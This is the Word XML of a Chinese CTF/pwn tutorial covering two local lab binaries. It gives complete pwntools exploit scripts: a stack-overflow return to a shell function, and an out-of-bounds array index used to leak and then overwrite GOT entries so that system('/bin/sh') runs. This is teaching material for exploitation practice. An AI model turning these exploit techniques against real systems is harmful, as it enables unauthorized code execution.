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65" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D2CF2" w:rsidRDefault="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用file命令查看程序类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2CF2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CDD7D4D" wp14:editId="2135E7AB">
            <wp:extent cx="469582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F2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看出这是一个64位的Linux程序，所以我们使用64位版本的IDA打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序。在汇编视图下按F5可以得到反汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2CF2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C5004BD" wp14:editId="704F45BA">
            <wp:extent cx="5274310" cy="2152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F2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码逻辑很简单，并且存在栈溢出漏洞。仔细观察的话，不难发现还有另外一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D2CF2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29FF792D" wp14:editId="254677CE">
            <wp:extent cx="5274310" cy="2084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F2" w:rsidRDefault="003D2CF2" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么，只需要把返回地址指向</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数就可以了。那么，第一步就是测试偏移量</w:t>
      </w:r>
      <w:r w:rsidR="006E0A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。首先构造200字节的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3BFB00" wp14:editId="0A878513">
            <wp:extent cx="5274310" cy="504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4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并当做输入传递给程序，观察程序崩溃时的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28687073" wp14:editId="5451BB85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4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来计算偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6890B64C" wp14:editId="6A835606">
            <wp:extent cx="4181475" cy="352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4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>偏移量意味着我们可以按照</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘a’*18 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn函数地址 的形式构造pa</w:t>
      </w:r>
      <w:r>
        <w:t>yload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击脚本如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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6E0A4A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#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A4A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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A4A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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A4A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env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A4A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 xml:space="preserve"> python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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6E0A4A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# coding=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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6E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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6E0A4A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6E0A4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pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A4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6E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0A4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*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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6E0A4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6E0A4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process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6E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A4A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6E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0A4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6E0A4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6E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'a'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*</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0A4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+</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0A4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p64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6E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x4006d6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6E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4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sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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payload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6E0A4A" w:rsidRPr="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="006E0A4A">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FDF6E3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6E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A4A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2"/>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功后效果如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0A4A" w:rsidRDefault="006E0A4A" w:rsidP="003D2CF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EEB1DC5" wp14:editId="14BFAB86">
            <wp:extent cx="436245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89" w:rsidRDefault="00C27789" w:rsidP="003D2CF2"/>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="003D2CF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截图中需要用到的工具：gdb插件</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, python第三方库</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>pwntools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="003D2CF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样的，查看程序类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308F127C" wp14:editId="4BBB6E99">
            <wp:extent cx="472440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89" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此使用32位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分析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__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cdecl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main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argc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char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**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argv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char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**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envp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char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v4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// [esp+4Eh] [ebp-1Ah]@3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v5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// [esp+58h] [ebp-10h]@1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v6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// [esp+5Ch] [ebp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]@4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v7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// [esp+60h] [ebp-8h]@1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v7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setbuf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stdin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setbuf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stdout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printf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"what's your name?\n"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v5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__isoc99_scanf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"%s"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name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r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>while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v5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2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printf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"do you want to read or write?[R/w]"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__isoc99_scanf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"%s"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v4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C27789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v4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==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119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printf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"which one do you want to write\n"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__isoc99_scanf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"%d"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v6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printf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"Ok, input the value:"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__isoc99_scanf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"%d"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a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v6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]);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C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else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printf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"which one do you want to read\n"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__isoc99_scanf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"%d"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v6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printf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"this value is %d\n"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a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v6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]);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++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v5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puts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name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puts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"bye"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r w:rsidRPr="00C2778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:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>程序功能为：输入读或写，并给定任意下标，但程序没有对下标的范围进行检测，导致数组边界溢出，进而导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>内存任意读写</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>（内存任意读写意味着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>拿到shell）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>，这里我们选择通过got表来泄露地址以及最终的eip控制，那么其实这里比较关键的一步是偏移量的计算和数据的转换。完整的攻击代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1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#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> python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# coding=utf-8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pwn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859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import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*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ctypes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859900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import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*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slog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debug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local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slog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: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context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log_level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'debug'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process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'./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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array_overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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binf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ELF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'./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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array_overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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recvuntil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'name'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sendline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'/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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gdb.attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(p, open('./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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array_overflow_break</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="93A1A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'))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recvuntil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'[R/w]'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sendline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'R'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recvuntil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'read'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 w:hint="eastAsia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p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sendline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str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(-(</w:t>
      </w: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binf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symbols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'a'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]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-</w:t>
      </w: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binf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C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B58900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'printf'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])/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="2AA198"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2716E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2716E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="586E75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>计算数组下标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p.recvuntil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('value is ')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRPr="00F2716E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 w:hint="eastAsia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printf_addr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= c_uint32(int(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p.recvline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()[:-1])).value</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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#</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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把输出转换为地址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print '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printf_addr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is', hex(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printf_addr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libc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= ELF('/lib32/libc.so.6')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system_addr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= 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printf_addr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- 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libc.symbols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['printf'] + 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libc.symbols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['system']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print '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system_addr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is ', hex(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system_addr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p.recvuntil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('[R/w]')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p.sendline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('w')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p.recvuntil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('write')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 w:hint="eastAsia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p.sendline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str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(-(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binf.symbols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['a'] - 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binf.got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['puts'])/4))</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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#</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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计算修改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puts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函数需要的下标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p.recvuntil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('value:')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p.sendline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str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(c_int32(</w:t>
      </w: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system_addr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).value))</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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#</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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写入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system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函数地址</w:t>
      </w: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C27789" w:rsidRPr="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C2778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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C27789">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="657B83"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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#</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E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拿到</w:t>
      </w:r>
      <w:r w:rsidR="00F2716E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="657B83"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C27789" w:rsidRPr="00C27789" w:rsidRDefault="00C27789" w:rsidP="00C27789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C27789" w:rsidRPr="00C27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F2"/>
    <w:rsid w:val="001D7F65"/>
    <w:rsid w:val="003D2CF2"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rsid w:val="00C27789"/>
    <w:rsid w:val="00F2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6974"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{74C42C92-0FD3-4025-96B7-0FC1AEEB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C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2C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12">
    <w:name w:val="sc12"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="93A1A1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4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a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="859900"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc111">
    <w:name w:val="sc111"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="B58900"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc101">
    <w:name w:val="sc101"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="586E75"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc41">
    <w:name w:val="sc41"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="2AA198"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc21">
    <w:name w:val="sc21"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006E0A4A"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="2AA198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C27789"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc161">
    <w:name w:val="sc161"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C27789"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="B58900"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc11">
    <w:name w:val="sc11"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C27789"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="default"/>
      <w:color w:val="657B83"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sc61">
    <w:name w:val="sc61"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00C27789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Blueke Zhou</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Blueke Zhou</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-22T09:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-22T09:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>